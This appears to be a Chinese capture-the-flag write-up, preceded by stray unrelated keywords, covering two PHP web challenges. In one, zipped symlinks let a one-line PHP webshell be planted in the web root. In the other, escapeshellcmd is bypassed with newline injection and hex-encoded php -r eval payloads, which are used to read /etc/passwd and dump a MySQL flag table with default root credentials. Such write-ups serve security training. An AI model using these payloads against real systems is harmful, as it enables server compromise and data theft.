报纸做垂直门户网站,海南百度竞价排名,页面设计工作要求,沈阳建筑大学信息公开网2023
Unzip 类型#xff1a;任意文件上传漏洞 主要知识点#xff1a;软链接 随便上传一个一句话木马文件#xff0c;得到一串php代码 根据代码上传zip文件发现进入后还是此页面
代码审计#xff1a; ?php
error_reporting(0);
highlight_file(__FILE__);$finfo fin…2023
Unzip 类型任意文件上传漏洞 主要知识点软链接 随便上传一个一句话木马文件得到一串php代码 根据代码上传zip文件发现进入后还是此页面
代码审计 ?php
error_reporting(0);
highlight_file(__FILE__);$finfo finfo_open(FILEINFO_MIME_TYPE);
#创建一个新的文件资源用来确定文件的MIME类型
if (finfo_file($finfo, $_FILES[file][tmp_name]) application/zip){exec(cd /tmp unzip -o . $_FILES[file][tmp_name]);
};
#上传的代码如果是MIME类型为application/zip的文件将被解压到/tmp目录
#unzip -o不必先询问用户unzip执行后覆盖原有的文件//only this!
上传的文件被解压到/tmp目录并且我们发现代码中没有include和require说明不能执行文件里的代码 扩展 include当使用Include指令包含文件时如果文件不存在或者有语法错误PHP将生成一个警告Warning级别的错误并且脚本将继续执行。 requirerequire也是用于包含文件。但是如果文件不存在或者有语法错误PHP将生成一个致命错误Fatal Error并且脚本执行会立即停止。 因此要想执行文件的代码我们就不能将文件放入/tmp目录此时就需要用到软链接将文件放入任意目录下从而执行文件中的一句话木马 软链接 软链接(Symbolic Link)也称为符号链接,是包含了源文件位置信息的特殊文件用Linux中的命令执行。它的作用是间接指向一个文件或目录也就是为文件在另一个地方建立一个同步的链接。如果软链接的源文件被删除或移动了,软链接就打不开了。 优点 软链接可以跨越不同的文件系统因为它们只存储了路径信息而不依赖于inode号。软链接可以用于目录因为它们不会导致目录结构的混乱和循环引用。软链接可以反映原文件的变化例如修改时间和权限等。 使用场景 当需要为不同位置或不同文件系统的文件或目录创建快捷方式时可以使用软链接。当需要创建动态的文件或目录关联时可以使用软链接。当需要保留原文件的属性和变化时可以使用软链接。 创建一个指向/var/www/html目录的软链接html目录下是web环境 ln -s /var/www/html/ link #为/var/www/html目录创建一个软链接link 压缩软链接 zip --symlinks link1.zip link #将软链接link压缩为link1.zip文件 创建一个link目录 rm link #防止系统中有link目录造成冲突 mkdir link #创建link目录 进入link目录放入一个一句话木马文件shell.php
退出link目录将link目录里的文件和目录本身全部压缩为link2.zip 上面由于放在用户目录里比较不直观将其放在一个文件夹中这一步没有实际作用仅展示创建结果同时也是方便放到windows界面 先传上link1.zip再传上link2.zip一定要先1后2然后访问shell.php发现成功执行一句话木马 因此我们将一句话木马改为?php eval($_POST[shell]);? 上传后 接下去用命令执行或者用蚁剑连接 得到flag 2024
simple_php 代码审计
escapeshellcmd()函数会转义可能用于欺骗shell执行任意命令的任何字符。正则匹配绕过了一堆字符。POST请求传入了一个参数cmd进行system()命令的执行。
思路一
尝试用%0a进行绕过
用bp抓包 l%0as / 发现绕过成功但没发现疑似flag的文件根据经验用户的必要信息一般会放在/etc/passwd中可能会有flag 补充 /etc/passwd保存了所有用户的用于读取的必要信息包括用户的①名称②登录口令情况③用户ID④所属组ID⑤用户的全称等其它详细信息⑥用户的home目录⑦用户的默认登录shell。 扩展 在早期加密的密码的确是存在/etc/passwd文件中的后面为了安全性考虑。将加密的密码文件存在了/etc/shadow(影子口令文件)中了。 进入/etc/passwd查看 c%0aat /etc/passwd 发现还是没有flag但是发现了一个mysql用户flag可能在数据库中 思路二
直接用paste命令或rev命令 paste /etc/passwd #paste命令可以将每个文件的行以列的形式加以合并并输出。 rev /etc/passwd #rev命令可以将文件中的内容以逆序的方式显示出来。 根据经验会直接尝试查看/etc/passwd这个目录有没有泄露 查看数据库数据库默认信息账号root —— 密码root管理员账号需要自定义。
执行shell命令 php -r eval(echo mysql -u root -proot -e show databases;;); #php -r在PHP中-r命令行选项允许你直接从命令行执行PHP代码而不需要将代码写入一个文件。 由于escapeshellcmd()函数会转义可能用于欺骗shell执行任意命令的任何字符所以我们将shell命令转化为hax值用base64不可行
构造payload php -r eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f742720 2d65202773686f77206461746162617365733b27603b,1))); #hex2bin()将16进制转化为ASCII 查看PHP_CMS数据库 echo mysql -u root -proot -e use PHP_CMS;show tables;; #use PHP_CMSsql语句使用PHP_CMS数据库 构造payload cmdphp -r eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f742720 2d652027757365205048505f434d533b73686f77207461626c65733b27603b,1))); 发现可能有flag的表查看F1ag_Se3Re7 echo mysql -u root -proot -e use PHP_CMS;show tables;select * from F1ag_Se3Re7;; 构造payload cmdphp -r eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f742720 2d652027757365205048505f434d533b73686f77207461626c65733b73656c656374202a20 66726f6d20463161675f5365335265373b27603b,1)));
